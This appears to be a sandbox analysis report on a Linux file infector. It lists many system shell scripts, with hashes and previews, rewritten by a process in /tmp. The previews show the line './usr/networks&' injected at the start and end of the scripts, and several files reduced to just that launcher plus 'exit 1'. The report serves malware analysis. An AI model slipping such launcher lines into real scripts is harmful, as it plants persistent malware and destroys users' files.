                                                                                                                            Preview: ./usr/networks&. *) printf "ERROR: unsupported '%s' page folding\n" "$FOLDING" >&2 ; exit 1 ;;. esac.. # Configure dots spacing. case "$TEXTDOTDISTANCE" in. 220) INIT+=,TD1 ;;. 250) INIT+=,TD0 ;;. 320) INIT+=,TD2 ;;. *) printf "ERROR: unsupported '%s' text dot distance\n" "$TEXTDOTDISTANCE" >&2 ; exit 1 ;;. esac. case $GRAPHICDOTDISTANCE in. 160) INIT+=,GD2 ;;. 200) INIT+=,GD0 ;;. 250) INIT+=,GD1 ;;. *) printf "ERROR: unsupported '%s'graphic dot distance\n" "$GRAPHICDOTDISTANCE" >&2 ; exit 1 ;;. esac.. echo "$INIT".}../usr/networks&.exit 1.
                                                                                                                            /usr/share/cups/braille/indexv3.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):945
                                                                                                                            Entropy (8bit):4.9071581716168575
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:hO+DYLYWYZBBmbq2rywi+bdKz80g/D+6k9JSW9L:DDYLYWYZ3rwi+BKjg/D+RJSW9L
                                                                                                                            MD5:F0CACB80F022AB8FC64F04310E59BEC2
                                                                                                                            SHA1:059D10F9C33BF8724F38F1E4A444022D9CEDBD82
                                                                                                                            SHA-256:62634D82D3013B5004E7220BC0CEBA6AE0C6DAFDC41C5B4D19B49A5154BFCE09
                                                                                                                            SHA-512:B94116448FBC22E5E205225FD18B8D3D159BD5BA2E68758BF12EE4EA12860F40C0F5DD8B7F064C8B1994280BDD999779035F80F2D55937C54A649F02A8BC7068
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Hoping the user properly configured an 8-dot table. 8) ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                            /usr/share/cups/braille/indexv4.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):818
                                                                                                                            Entropy (8bit):4.8178661177968065
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:C9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:wDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                                                                            MD5:07C3F2CE31B1380132DE8B1D5B9C4BA8
                                                                                                                            SHA1:769D00809D188A7D9F8357152C9B82F634C0514B
                                                                                                                            SHA-256:162E03582392361663035FF70A573CB379796CA647404BFFBE1C22D6AE7C25FB
                                                                                                                            SHA-512:CB698C8E13D0635643F5F8102FFA961D050649F82FB915155B5D19E4CFC5985C86586BF41082731ACFDCBA5F799FF7F056A4D6AD0337383FABC4731D352D16CD
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                            /usr/share/debconf/confmodule.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/acpid/examples/ac.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/acpid/examples/default.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):309
                                                                                                                            Entropy (8bit):4.972882784760757
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                                                                                            MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                                                                                            SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                                                                                            SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                                                                                            SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/cron/examples/cron-tasks-review.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3647
                                                                                                                            Entropy (8bit):4.544491450799858
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                                                                                            MD5:734F4010B22A9F64DBCCED57155A6396
                                                                                                                            SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                                                                                            SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                                                                                            SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                                                                            /usr/share/doc/gawk/examples/network/PostAgent.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/gawk/examples/prog/igawk.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:awk or perl script, ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1829
                                                                                                                            Entropy (8bit):4.38604786798686
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                                                                                            MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                                                                                            SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
                                                                                                                            SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
                                                                                                                            SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                                                                            /usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/gdb/contrib/ari/gdb_find.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/gdb/contrib/expect-read1.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):253
                                                                                                                            Entropy (8bit):5.267626424494032
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                                                                                            MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                                                                                            SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                                                                                            SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                                                                                            SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/gdb/contrib/gdb-add-index.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1048
                                                                                                                            Entropy (8bit):4.806462537404251
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:yJI5VNyJmc20JsvodjbGCHiVwZvFfg0udaATYdITFvVg47VZ0ou:II63pJftBudaqYmTFmJ
                                                                                                                            MD5:5864556D6334995F87B9236F2BDDAE2F
                                                                                                                            SHA1:65C2E90583C5B2DF8050063559E7FA2885F7427F
                                                                                                                            SHA-256:4BBE42BA86B2EBBC463E505A6D3551775BB4E2ED64BDA2C8F1E7B50B9F4C99C3
                                                                                                                            SHA-512:0E99B5F846FE6295B4ACFF8030BCBE895D1BCCCDF7B0098E8DABF8ADC50E56CA8A38A549B5A052C86FF9DA9B0A2C7BFBAD7CE939F373AB78F525FEEF2065D615
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir=".".index="${file}.gdb-index"..rm -f $index.# Ensure intermediate index file is removed when we exit..trap "rm -f $index" 0..$GDB --batch -nx -iex 'set auto-load no' \. -ex "file $file" -ex "save gdb-index $dir" || {. # Just in case.. status=$?. echo "$myname: gdb error generating index for $file" 1>&2. exit $status.}..# In some situations gdb can exit without creating an index. This is.# not an error..# E.g., if $file is stripped. This behaviour is akin to stripping an.# already stripped binary, it's a no-op..status=0..if test -f "$index"; then. $OBJCOPY --add-section .gdb_index="$index" \..--set-section-flags .gdb_index=readonly "$file" "$file". status=$?.else. echo "$myname: No index was created for $file" 1>&2. echo "$myname: [Was there no debuginfo? Was there already an index?
                                                                                                                            /usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/examples/git-am.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:OS/2 REXX batch file, ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):21942
                                                                                                                            Entropy (8bit):5.106661772210516
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:6REUag9f8Ydg0VeV9KziwsORFRByXlU1m4csVIw17OqlDfRRdxyZymevMNcPh/Rl:6Rhb9fJd1Vmkziw9RFRByX8D7Vd7Oqlh
                                                                                                                            MD5:16E6ACE0E85A54EA4C061BDA1D3BF70D
                                                                                                                            SHA1:B2569F727A9B61E0583574CC0793647136F76E32
                                                                                                                            SHA-256:B56C64E30B028ACB3523D99266AD8931417240B883EC8961ED24F4004D6EA1C9
                                                                                                                            SHA-512:F730D5171A9533A87455BEA4133439096E9A53C4783FAD29DA3DFDB9BBCD2F05DDF9EBBEBB94CF21AC4138833AB83B9AEF94612D5538671F29B726F147749322
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 1.}..safe_to_abort () {..if test -f "$dotest/dirtyindex"..then...return 1..fi...if ! test -f "$dotest/abort-safety"..then...return 0..fi...abort_safety=$(cat "$dotest/abort-safety")..if test "z$(git rev-parse --verify -q HEAD)" = "z$abort_safety"..then...return 0..fi..gettextln "You seem to have moved HEAD since the last 'am' failure..Not rewinding to ORIG_HEAD" >&2..return 1.}..stop_here_user_resolve () {. if [ -n "$resolvemsg" ]; then.. printf '%s\n' "$resolvemsg".. stop_here $1. fi. eval_gettextln "When you have resolved this problem, run \"\$cmdline --continue\"..If you prefer to skip this patch, run \"\$cmdline --skip\" instead..To restore the original branch and stop patching, run \"\$cmdline --abort\".".. stop_here $1.}..go_next () {..rm -f "$dotest/$msgnum" "$dotest/msg" "$dotest/msg-clean" \..."$dotest/patch" "$dotest/info"..echo "$next" >"$dotest/next"..this=$next.}..cannot_fallback () {..echo "$1"..gettextln "Cannot fall back to thr
                                                                                                                            /usr/share/doc/git/contrib/examples/git-checkout.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4825
                                                                                                                            Entropy (8bit):5.113528532566079
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:dFHSEVt3CuAqnOGD5OKNPLT85zoEl5kJbDF772+u/NvZKJhGY44FVT0HAqFt3e:LTVUCDgKNDT8CB72hxChZ40KfQ
                                                                                                                            MD5:595AE545C31B21B58D1C77B533F7A2D4
                                                                                                                            SHA1:86F2DA045AA3718950585397A21D5387682A3548
                                                                                                                            SHA-256:9DACE4B4205D10F2705B32DC8963F132E51FC1D9DF799AE543EC6BE6115FA2B0
                                                                                                                            SHA-512:A8799023F5550B631064E93EFF1E4786A2362AB3B409D143800CE408BD150CECD74AD3266B32E8CBF7B0A007E352F3F4DA3D1EB7D216DA26413E718E2DCFC09C
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&...git update-index --index-info || exit $?..fi...# Make sure the request is about existing paths...git ls-files --full-name --error-unmatch -- "$@" >/dev/null || exit..git ls-files --full-name -- "$@" |...(cd_to_toplevel && git checkout-index -f -u --stdin)...# Run a post-checkout hook -- the HEAD does not change so the..# current HEAD is passed in for both args..if test -x "$GIT_DIR"/hooks/post-checkout; then.. "$GIT_DIR"/hooks/post-checkout $old $old 0..fi...exit $?.else..# Make sure we did not fall back on $arg^{tree} codepath..# since we are not checking out from an arbitrary tree-ish,..# but switching branches...if test '' != "$new"..then...git rev-parse --verify "$new^{commit}" >/dev/null 2>&1 ||...die "Cannot switch branch to a non-commit."..fi.fi..# We are switching branches and checking out trees, so.# we *NEED* to be at the toplevel..cd_to_toplevel..[ -z "$new" ] && new=$old && new_name="$old_name"..# If we don't have an existing branch that we're switching
                                                                                                                            /usr/share/doc/git/contrib/examples/git-clean.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/examples/git-clone.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):11759
                                                                                                                            Entropy (8bit):5.2205279036587235
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:9M6sMKXA+aN0VYXNXYdcYZRoT+7rdVAqmdOIhH+Cqd1WPnaetMkTri0i55rIIq4G:SMxpY6YZRoTeJHf4H+CqdPAM8+p86TvK
                                                                                                                            MD5:1E0926F456D9D5C35DF266EF276212C6
                                                                                                                            SHA1:4C741DD9AD5F798BDCE0F67172F2B790FFF1B6BD
                                                                                                                            SHA-256:C1DA77F45A430BC683EF4C9DDAA2AFB3B8F3D6F75A6B0406C456DFF3B4637BBC
                                                                                                                            SHA-512:30A51026697132EA1F83C1D5BCF796C17AB7EC418352FF268BD1461397F9A2280E5752FC673ACE99F606B6E136E0F2A85FFF2F0BF8D12AE0A35C8D95C5A7A478
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit 1.}..usage() {..exec "$0" -h.}..eval "$(echo "$OPTIONS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..get_repo_base() {..(...cd "$(/bin/pwd)" &&...cd "$1" || cd "$1.git" &&...{....cd .git....pwd...}..) 2>/dev/null.}..if [ -n "$GIT_SSL_NO_VERIFY" -o \.."$(git config --bool http.sslVerify)" = false ]; then. curl_extra_args="-k".fi..http_fetch () {..# $1 = Remote, $2 = Local..curl -nsfL $curl_extra_args "$1" >"$2"..curl_exit_status=$?..case $curl_exit_status in..126|127) exit ;;..*). return $curl_exit_status ;;..esac.}..clone_dumb_http () {..# $1 - remote, $2 - local..cd "$2" &&..clone_tmp="$GIT_DIR/clone-tmp" &&..mkdir -p "$clone_tmp" || exit 1..if [ -n "$GIT_CURL_FTP_NO_EPSV" -o \..."$(git config --bool http.noEPSV)" = true ]; then...curl_extra_args="${curl_extra_args} --disable-epsv"..fi..http_fetch "$1/info/refs" "$clone_tmp/refs" ||...die "Cannot get remote repository information..Perhaps git-update-server-info needs to be run there?"..test "z$qu
                                                                                                                            /usr/share/doc/git/contrib/examples/git-commit.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):13843
                                                                                                                            Entropy (8bit):5.402105827507175
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:ohf3saLCKohntpFFLWt8CKHNFQCglPySY2rOsMi/URiCNW8msLDkV+HZqIgCu:ohf3ThWnnFFLWqCKtFz1SY2rOstURiCK
                                                                                                                            MD5:801864707ABB06C3ACD5E9AA7EF0A231
                                                                                                                            SHA1:1492CCEEA7F7892507958970BD7012850E3D8498
                                                                                                                            SHA-256:C4945D20EEF27CDF5E23450FF797808F6F58C8973B9ED415B7E391B24D3D895C
                                                                                                                            SHA-512:ABD01060290B46E9F538D6E9E88F4F9FDCDFECF7715DE0CB860CCF053899453BDC701F82AD16BA12DB3B688DAF9B0429D4FBC5F6EEB1F4621CF68BA8868D733A
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit 1.}..TMP_INDEX=.THIS_INDEX="${GIT_INDEX_FILE:-$GIT_DIR/index}".NEXT_INDEX="$GIT_DIR/next-index$$".rm -f "$NEXT_INDEX".save_index () {..cp -p "$THIS_INDEX" "$NEXT_INDEX".}..run_status () {..# If TMP_INDEX is defined, that means we are doing..# "--only" partial commit, and that index file is used..# to build the tree for the commit. Otherwise, if..# NEXT_INDEX exists, that is the index file used to..# make the commit. Otherwise we are using as-is commit..# so the regular index file is what we use to compare...if test '' != "$TMP_INDEX"..then...GIT_INDEX_FILE="$TMP_INDEX"...export GIT_INDEX_FILE..elif test -f "$NEXT_INDEX"..then...GIT_INDEX_FILE="$NEXT_INDEX"...export GIT_INDEX_FILE..fi...if test "$status_only" = "t" || test "$use_status_color" = "t"; then...color=..else...color=--nocolor..fi..git runstatus ${color} \...${verbose:+--verbose} \...${amend:+--amend} \...${untracked_files:+--untracked}.}..trap '..test -z "$TMP_INDEX" || {...test -f "$TMP_INDEX" && rm -
                                                                                                                            /usr/share/doc/git/contrib/examples/git-fetch.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5954
                                                                                                                            Entropy (8bit):5.053117199381536
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:qjiwPNH32mZrlw8DpKg1ol8p2vgW7Tle8yibXzcDUyUuf1s7pbEVALomiS7yDRNL:qjrPNH32mZrlw8Dz1ol8p2YW/le8yib0
                                                                                                                            MD5:660949C6D769C055433FA32AD8CF7CB7
                                                                                                                            SHA1:D32B9EB0B032620ABDD884C3F205135F48A5CCAA
                                                                                                                            SHA-256:8D505E7404190C524B25A82E6D935752034AC993B74C2B704B93A8F69BA56FF5
                                                                                                                            SHA-512:65C50E1465E3D47F5703D87D9B6EB54CE63670D94A47C4341F42FBAB3566A3EE27159C968D55ACE8A2B4F8E7AC0B3E30BBA3BC42E24FAA92BFA5DAFAEC8ECA94
                                                                                                                            Malicious:false
